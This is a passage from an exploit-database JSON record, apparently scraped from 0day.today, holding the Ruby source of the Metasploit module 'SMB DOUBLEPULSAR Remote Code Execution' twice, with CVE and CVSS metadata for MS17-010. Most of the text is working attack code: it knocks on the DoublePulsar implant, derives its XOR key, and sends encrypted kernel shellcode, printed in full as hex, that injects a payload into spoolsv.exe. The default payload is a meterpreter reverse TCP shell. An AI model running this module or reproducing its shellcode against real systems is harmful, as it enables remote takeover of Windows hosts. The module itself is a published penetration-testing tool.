0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T22:41:10", "differentElements": ["sourceData"], "edition": 42}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "088d0322453172175279a873703507ef", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-14T08:19:40", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-14T08:19:40", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-14T08:19:40", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 